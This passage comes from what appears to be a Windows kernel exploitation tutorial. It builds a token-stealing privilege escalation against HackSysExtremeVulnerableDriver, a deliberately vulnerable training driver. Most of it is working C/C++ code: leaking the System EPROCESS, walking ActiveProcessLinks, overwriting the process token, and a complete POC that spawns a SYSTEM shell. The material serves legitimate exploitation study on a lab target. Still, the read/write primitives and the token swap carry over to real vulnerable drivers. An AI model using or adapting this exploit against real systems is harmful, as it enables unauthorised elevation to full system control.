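static_assert(offsetof(MockEprocess, UniqueProcessId) == 0x440, "PID offset");
static_assert(offsetof(MockEprocess, ActiveProcessLinks) == 0x448, "links offset");
static_assert(offsetof(MockEprocess, Token) == 0x4b8, "token offset");

// A list entry points at the ActiveProcessLinks member of a process, not at the
// start of its EPROCESS, so the member offset has to be subtracted.
inline MockEprocess* eprocessFromLinks(ListEntry* links) {
    assert(links != nullptr);
    return reinterpret_cast<MockEprocess*>(
        reinterpret_cast<uint8_t*>(links) - offsetof(MockEprocess, ActiveProcessLinks));
}
```

Calling eprocessFromLinks(&proc.ActiveProcessLinks) on any MockEprocess gives back &proc, which is the same subtraction the exploit performs later on raw kernel addresses.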
With the above information, we are going to follow these steps:
- Step 1: Leak the system’s EPROCESS structure.
- Step 2: Starting from the system’s EPROCESS structure, follow the ActiveProcessLinks member and find our exploit’s EPROCESS structure with the help of the UniqueProcessId member.
- Step 3: Steal the system’s EPROCESS.Token value.
- Step 4: Retrieve our exploit’s EPROCESS.Token value.
- Step 5: Overwrite our exploit’s EPROCESS.Token value with the system’s Token.
Step 1: Leak system’s EPROCESS structure
To find the system’s EPROCESS structure, we can use the same method as in “Method (4)”: with the help of NtQuerySystemInformation(), we get every handle’s object address and search through them for the handle of the system process.
Interestingly, System’s first handle is the handle of its own process, which makes the work really easy.
Here is the updated code to get the EPROCESS structure of the system process:
- Like before, we get every handle on the machine using NtQuerySystemInformation().
- Then we take the very first handle entry in SYSTEM_HANDLE_INFORMATION and check whether its UniqueProcessId (which is the PID) is “4”, because the first handle is always the handle to the system process itself and system’s PID is always 4.
- If the UniqueProcessId of the first handle is 4, we take the handle’s Object; this is the EPROCESS address of the system process itself.
- As shown in the Process Hacker image above, the first handle is always the handle to the process itself. Since the Object is a “Process”, the address associated with it is the address of EPROCESS.
PVOID findEPROCESS() {
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return NULL;
    }
    printf("[+] Found ntdll!NtQuerySystemInformation\n");
    ULONG returnLen = 0x1000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = NULL;
    // Grow the buffer until the whole handle table fits
    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }
        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return NULL;
        }
        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);
    // The first entry is expected to be the system process's handle to itself (PID 4)
    PVOID sysEPROCESS = NULL;
    if (SystemHandleInfo->Handles[0].UniqueProcessId == 4) {
        sysEPROCESS = SystemHandleInfo->Handles[0].Object;
        printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS);
    }
    // Release the handle table before returning (NULL if the check failed)
    HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
    return sysEPROCESS;
}
int main()
{
    [::]
    // Step 1
    PVOID sysEPROCESS = findEPROCESS();
    if (sysEPROCESS == NULL) {
        printf("[-] Unable to find EPROCESS of the system.exe!\n");
        return 1;
    }
    [::]
}
Executing the POC retrieves the EPROCESS address of the system process, and it is the same as the “Process” handle’s address.
This can also be verified by passing the retrieved address to the !process command in WinDBG. The Image is shown as System, which confirms that we got the EPROCESS structure of the system process.
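The lookup in Step 1 trusts that the very first entry belongs to the system process. A slightly more defensive variant would scan the returned array for the first entry owned by PID 4 instead of assuming index 0. The sketch below shows only that scan, in portable C++. MockHandleEntry and firstObjectOwnedBy are hypothetical names, and the struct keeps only the fields the POC touches rather than the real handle entry layout.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical simplification of a handle table entry: only the fields that the
// POC reads (owner PID, handle value, kernel object address).
struct MockHandleEntry {
    uint16_t UniqueProcessId;
    uint16_t HandleValue;
    void*    Object;
};

// Returns the Object of the first entry owned by `pid`, or nullptr when the
// table contains no entry for that PID.
inline void* firstObjectOwnedBy(const MockHandleEntry* entries, size_t count, uint16_t pid) {
    assert(entries != nullptr || count == 0);
    for (size_t i = 0; i < count; ++i) {
        if (entries[i].UniqueProcessId == pid) {
            return entries[i].Object;
        }
    }
    return nullptr;
}
```

With a real handle table, the equivalent call would be made with pid set to 4, and a nullptr result would be treated the same way the POC treats a failed Step 1.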
Step 2: Find exploit’s EPROCESS structure
Now that we have the EPROCESS address of the system process, we can loop over the doubly linked list (ActiveProcessLinks), reading the address of the next process’s EPROCESS.ActiveProcessLinks at each step.
- I copied the offsets of the required members from the EPROCESS structure and stored them with #define for easy access.
- First, get the current process ID using GetCurrentProcessId() and store it in pid.
- Retrieve the address of the first EPROCESS.ActiveProcessLinks and store it in SysProcHead.
- Then the while loop begins, to find the EPROCESS of the exploit (current) process.
- The same kernelRead function is used here; it reads the next process’s EPROCESS.ActiveProcessLinks and stores it in nextProc.
- Then the offset of ActiveProcessLinks is subtracted from nextProc to get to the beginning of that process’s EPROCESS structure, because the ActiveProcessLinks doubly linked list always points to the next process’s EPROCESS.ActiveProcessLinks, not to the EPROCESS itself.
- Then I take the address of UniqueProcessId in that EPROCESS structure, read its value with kernelRead again, and store it in foundpid. If it is not the PID of the exploit process, the loop continues.
#define Offset_ActiveProcessLinks 0x448
#define Offset_UniqueProcessId 0x440
#define Offset_Token 0x4b8
[::]
// Step 2
printf("[+] Attempting to find EPROCESS address of the current process...\n");
DWORD pid = GetCurrentProcessId();
printf("[+] Current Process ID: 0x%lx\n", pid);
PVOID SysProcHead = PVOID((uintptr_t)sysEPROCESS + Offset_ActiveProcessLinks);
DWORD foundpid = 0;
PVOID nextPid = 0;
PVOID nextLinks = NULL;
PVOID nextProc = sysEPROCESS;
while (pid != foundpid) {
    // Flink of the current entry: address of the next process's ActiveProcessLinks
    nextLinks = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver);
    if (nextLinks == SysProcHead) {
        // Wrapped around to the system process without finding our PID
        printf("[-] Failed to find target's EPROCESS\n");
        return 1;
    }
    // Step back from the list entry to the start of that EPROCESS
    nextProc = PVOID((uintptr_t)nextLinks - Offset_ActiveProcessLinks);
    nextPid = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId);
    foundpid = (DWORD)(uintptr_t)kernelRead(nextPid, hDriver);
}
if (nextProc == NULL) {
    printf("[-] Unable to find EPROCESS of current process!\n");
    return 1;
}
PVOID currentEPROCESS = nextProc;
printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS);
Executing the POC finds, as expected, the EPROCESS structure of the exploit (whatwhere4.exe).
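The walk in Step 2 can be tried out without a kernel at all. The sketch below is a simulation: FakeKernel, read64, buildRing, and findEprocessByPid are hypothetical names, and a std::map of address to qword stands in for kernel memory read through the primitive. The real list also passes through a list head that is not embedded in any EPROCESS, which this sketch leaves out.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>
#include <utility>
#include <vector>

constexpr uint64_t kOffLinks = 0x448;  // Offset_ActiveProcessLinks from the post
constexpr uint64_t kOffPid   = 0x440;  // Offset_UniqueProcessId from the post

using FakeKernel = std::map<uint64_t, uint64_t>;  // address -> 8-byte value

// Stand-in for kernelRead: returns the qword stored at addr (0 if unmapped).
inline uint64_t read64(const FakeKernel& mem, uint64_t addr) {
    auto it = mem.find(addr);
    return it == mem.end() ? 0 : it->second;
}

// Builds a circular list of fake processes given (EPROCESS address, PID) pairs.
inline void buildRing(FakeKernel& mem,
                      const std::vector<std::pair<uint64_t, uint32_t>>& procs) {
    for (size_t i = 0; i < procs.size(); ++i) {
        const auto& next = procs[(i + 1) % procs.size()];
        mem[procs[i].first + kOffPid]   = procs[i].second;
        mem[procs[i].first + kOffLinks] = next.first + kOffLinks;  // Flink
    }
}

// Follows Flink pointers from startEprocess until the PID matches.
// Returns the matching EPROCESS address, or 0 after one full lap.
inline uint64_t findEprocessByPid(const FakeKernel& mem, uint64_t startEprocess,
                                  uint32_t pid) {
    assert(startEprocess != 0);
    uint64_t cur = startEprocess;
    do {
        if (static_cast<uint32_t>(read64(mem, cur + kOffPid)) == pid) {
            return cur;
        }
        const uint64_t flink = read64(mem, cur + kOffLinks);
        if (flink == 0) {
            return 0;  // broken list, give up
        }
        cur = flink - kOffLinks;  // list entry -> start of that EPROCESS
    } while (cur != startEprocess);
    return 0;
}
```

The important detail is the stop condition: the search ends when the walk arrives back at the EPROCESS it started from, so a PID that is not in the list cannot cause an endless loop.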
Step 3: Steal system’s Token
Now that we have the EPROCESS addresses of both the system process and the exploit, we can read the Token value of the system process first. This step simply reads that value and stores it in sysToken.
// Step 3
PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver);
printf("[+] System's EPROCESS.Token value: %p\n", sysToken);
The updated code retrieves the Token value of the system process.
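Steps 3 and 4 are plain reads, which works because the one bug gives us both directions: the driver copies a pointer-sized value from What to Where, so pointing What at a kernel address reads it, and pointing Where at a kernel address writes it. A minimal in-process simulation of that idea follows. fakeTriggerArbitraryWrite, simRead, and simWrite are hypothetical names, and an ordinary variable plays the role of kernel memory.

```cpp
#include <cassert>
#include <cstdint>

// Same two-pointer shape as the WRITE_WHAT_WHERE structure used by the POC.
struct WriteWhatWhere {
    uint64_t* What;   // address the value is copied from
    uint64_t* Where;  // address the value is copied to
};

// Stand-in for the vulnerable routine: copies one 8-byte value from *What to
// *Where without validating either pointer.
inline void fakeTriggerArbitraryWrite(const WriteWhatWhere& req) {
    assert(req.What != nullptr && req.Where != nullptr);
    *req.Where = *req.What;
}

// Read primitive: What is the target address, Where is our own buffer.
inline uint64_t simRead(uint64_t* target) {
    uint64_t out = 0;
    fakeTriggerArbitraryWrite({target, &out});
    return out;
}

// Write primitive: What is our own value, Where is the target address.
inline void simWrite(uint64_t value, uint64_t* target) {
    fakeTriggerArbitraryWrite({&value, target});
}
```

The simulated read uses a local variable as its destination. The POC's kernelRead allocates a fresh page with VirtualAlloc on every call instead, which also works but is never freed.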
Step 4: Retrieve exploit’s Token
This step is the same as the previous one, except that we read the Token value of the exploit (whatwhere4.exe).
// Step 4
PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken);
We read this value instead of directly overwriting the Token because _EX_FAST_REF is a union that also contains RefCnt, the reference count, in its low bits. RefCnt should not be disturbed; a wrong value might lead to a BSOD.
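As a small illustration of that union, the sketch below splits a raw Token value into its two parts. It assumes the four-bit RefCnt implied by the 0xf mask used in this POC; fastRefObject, fastRefCount, and makeFastRef are hypothetical helper names.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kRefCntMask = 0xF;  // low 4 bits hold RefCnt (assumed, x64)

// Pointer part of the fast reference: the raw value with RefCnt cleared.
inline uint64_t fastRefObject(uint64_t value) { return value & ~kRefCntMask; }

// Reference-count part of the fast reference.
inline uint64_t fastRefCount(uint64_t value) { return value & kRefCntMask; }

// Rebuilds a raw value from an aligned object address and a small count.
inline uint64_t makeFastRef(uint64_t object, uint64_t refCnt) {
    assert((object & kRefCntMask) == 0);  // object must be 16-byte aligned
    assert(refCnt <= kRefCntMask);
    return object | refCnt;
}
```

For a made-up raw value of 0xffffa10f12345674, the object part is 0xffffa10f12345670 and the count is 4.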
Step 5: Replace the Token value
Now we overwrite the whatwhere4.exe token with the system token, except for the low four bits (the 0xf mask), to avoid disrupting the reference count. After overwriting the Token value, we launch cmd.exe.
// Step 5
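// Keep our own RefCnt (low 4 bits) and take the remaining bits from the system token
PVOID newToken = (PVOID((uintptr_t)curToken & 0xf));
newToken = (PVOID((uintptr_t)newToken | ((uintptr_t)sysToken & ~(uintptr_t)0xf)));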
printf("[+] Modified EPROCESS.Token value: %p\n", newToken);
printf("[+] Attempting to overwrite current process's Token to escalate...\n");
BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
if (!status) {
printf("[-] Failed to overwrite current process's Token value...\n");
return 1;
}
getchar();
printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");
Got system:
We got a shell as SYSTEM with HVCI enabled. We didn’t actually bypass anything here; we just stole the Token of the system process. Still, it’s a really effective way to get SYSTEM.
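Steps 3 to 5 can be rehearsed end to end against fake memory. The sketch below is a simulation under stated assumptions: FakeKernel, read64, write64, and stealToken are hypothetical names, a std::map stands in for kernel memory, and the token offset is the build-specific 0x4b8 used in this post.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

constexpr uint64_t kOffToken = 0x4b8;  // Offset_Token from the post
constexpr uint64_t kRefMask  = 0xF;    // RefCnt bits of the fast reference

using FakeKernel = std::map<uint64_t, uint64_t>;  // address -> 8-byte value

// Stand-ins for kernelRead and kernelWrite.
inline uint64_t read64(const FakeKernel& mem, uint64_t addr) {
    auto it = mem.find(addr);
    return it == mem.end() ? 0 : it->second;
}
inline void write64(FakeKernel& mem, uint64_t addr, uint64_t value) {
    mem[addr] = value;
}

// Copies the system token into the current process while preserving the
// current process's own RefCnt bits. Returns the value that was written.
inline uint64_t stealToken(FakeKernel& mem, uint64_t sysEprocess, uint64_t curEprocess) {
    const uint64_t sysToken = read64(mem, sysEprocess + kOffToken);          // Step 3
    const uint64_t curToken = read64(mem, curEprocess + kOffToken);          // Step 4
    const uint64_t merged = (sysToken & ~kRefMask) | (curToken & kRefMask);  // Step 5
    assert((merged & kRefMask) == (curToken & kRefMask));
    write64(mem, curEprocess + kOffToken, merged);
    return merged;
}
```

With a made-up system token of 0xffff8000aaaa0047 and a current token of 0xffff8000bbbb0062, the value written is 0xffff8000aaaa0042: the pointer bits come from the system process and the trailing 2 is the exploit's own count. The system token itself is only read, never modified.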
Note: Starting from Windows 11 24H2, EnumDeviceDrivers() and NtQuerySystemInformation() require SeDebugPrivilege to obtain kernel addresses. This means you must be an Administrator in order to use them on the latest Windows 11 version, which can be a problem for exploits that start from a low-privileged user.
Full POC
#include <Windows.h>
#include <stdio.h>
#include <psapi.h>
#include "header.h"

#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define Offset_ActiveProcessLinks 0x448
#define Offset_UniqueProcessId 0x440
#define Offset_Token 0x4b8

typedef struct _WRITE_WHAT_WHERE {
    void* WHAT;
    void* WHERE;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
    WRITE_WHAT_WHERE input;
    LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    // WHAT = kernel address to read, WHERE = user buffer that receives the value
    input.WHAT = (LPVOID)(readAddr);
    input.WHERE = (LPVOID)(storeAddr);
    // printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
    BOOL success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);
    /*
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return FALSE;
    }
    */
    LPVOID* data = (LPVOID*)storeAddr;
    return *data;
}

BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
    WRITE_WHAT_WHERE input;
    // WHAT = address of the value to write, WHERE = kernel address to overwrite
    input.WHAT = (LPVOID)(&data);
    input.WHERE = (LPVOID)(writeAddr);
    // printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
    BOOL success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);
    if (success) {
        return TRUE;
    }
    else {
        return FALSE;
    }
}

PVOID findEPROCESS() {
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return NULL;
    }
    printf("[+] Found ntdll!NtQuerySystemInformation\n");
    ULONG returnLen = 0x1000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = NULL;
    // Grow the buffer until the whole handle table fits
    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }
        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return NULL;
        }
        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);
    // The first entry is expected to be the system process's handle to itself (PID 4)
    PVOID sysEPROCESS = NULL;
    if (SystemHandleInfo->Handles[0].UniqueProcessId == 4) {
        sysEPROCESS = SystemHandleInfo->Handles[0].Object;
        printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS);
    }
    HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
    return sysEPROCESS;
}

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    // Step 1
    PVOID sysEPROCESS = findEPROCESS();
    if (sysEPROCESS == NULL) {
        printf("[-] Unable to find EPROCESS of the system.exe!\n");
        return 1;
    }
    getchar();

    // Step 2
    printf("[+] Attempting to find EPROCESS address of the current process...\n");
    DWORD pid = GetCurrentProcessId();
    printf("[+] Current Process ID: 0x%lx\n", pid);
    PVOID SysProcHead = PVOID((uintptr_t)sysEPROCESS + Offset_ActiveProcessLinks);
    DWORD foundpid = 0;
    PVOID nextPid = 0;
    PVOID nextLinks = NULL;
    PVOID nextProc = sysEPROCESS;
    while (pid != foundpid) {
        // Flink of the current entry: address of the next process's ActiveProcessLinks
        nextLinks = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver);
        if (nextLinks == SysProcHead) {
            // Wrapped around to the system process without finding our PID
            printf("[-] Failed to find target's EPROCESS\n");
            return 1;
        }
        // Step back from the list entry to the start of that EPROCESS
        nextProc = PVOID((uintptr_t)nextLinks - Offset_ActiveProcessLinks);
        nextPid = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId);
        foundpid = (DWORD)(uintptr_t)kernelRead(nextPid, hDriver);
    }
    if (nextProc == NULL) {
        printf("[-] Unable to find EPROCESS of current process!\n");
        return 1;
    }
    PVOID currentEPROCESS = nextProc;
    printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS);
    getchar();

    // Step 3
    PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver);
    printf("[+] System's EPROCESS.Token value: %p\n", sysToken);
    getchar();

    // Step 4
    PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
    printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken);
    getchar();

    // Step 5
    // Keep our own RefCnt (low 4 bits) and take the remaining bits from the system token
    PVOID newToken = (PVOID((uintptr_t)curToken & 0xf));
    newToken = (PVOID((uintptr_t)newToken | ((uintptr_t)sysToken & ~(uintptr_t)0xf)));
    printf("[+] Modified EPROCESS.Token value: %p\n", newToken);
    printf("[+] Attempting to overwrite current process's Token to escalate...\n");
    BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
    if (!status) {
        printf("[-] Failed to overwrite current process's Token value...\n");
        return 1;
    }
    getchar();
    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");
    return 0;
}
Reference:
- https://www.crowdstrike.com/en-us/blog/state-of-exploit-development-part-1/
- https://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html
- https://connormcgarr.github.io/Kernel-Exploitation-2/
- https://connormcgarr.github.io/pte-overwrites/
- https://connormcgarr.github.io/hvci/
- https://msrc.microsoft.com/blog/2022/04/randomizing-the-kuser_shared_data-structure-on-windows/
- https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntexapi_x/kuser_shared_data/index.htm
- https://fourcore.io/blogs/how-a-windows-process-is-created-part-2